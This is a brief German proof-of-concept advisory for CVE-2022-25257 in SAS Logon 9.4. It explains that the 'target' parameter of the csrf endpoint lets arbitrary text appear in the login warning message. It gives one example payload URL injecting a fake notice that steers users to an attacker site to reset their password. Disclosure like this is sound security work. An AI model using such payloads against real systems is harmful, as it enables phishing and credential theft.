
Proof-of-Concept-Exploit für CVE-2022-25257: CSRF-Parameterinjektion in SAS Logon 9.4, die das Spoofing von Warnmeldungen für Phishing-Angriffe ermöglicht.
SAS Logon 9.4 ermöglicht das Einschleusen von Warnmeldungen.
Entdeckt: 15. Februar 2022
Betroffene Versionen:
9.4
POC-Exploit:
SASLogon/csrf hat einen Parameter namens "target"
Dieser Parameter beeinflusst die Warnmeldung für die URL, die der Benutzer öffnen wollte (aber das System blockiert sie wegen der unbekannten Herkunft). Durch Ändern des Parameters kann man eine lange gefälschte Aussage schreiben, die einen nichtsahnenden Benutzer beeinflussen kann.
Beispiel für einen Payload: https://example:8343/SASLogon/csrf?target=Hello%20Dear%20customers%20during%20the%20corona%20pandemic%20our%20new%20website%20is%20at%20http://evilRobertsWeb.com%20please%20visit%20this%20link%20to%20reset%20the%20password
Bilder:
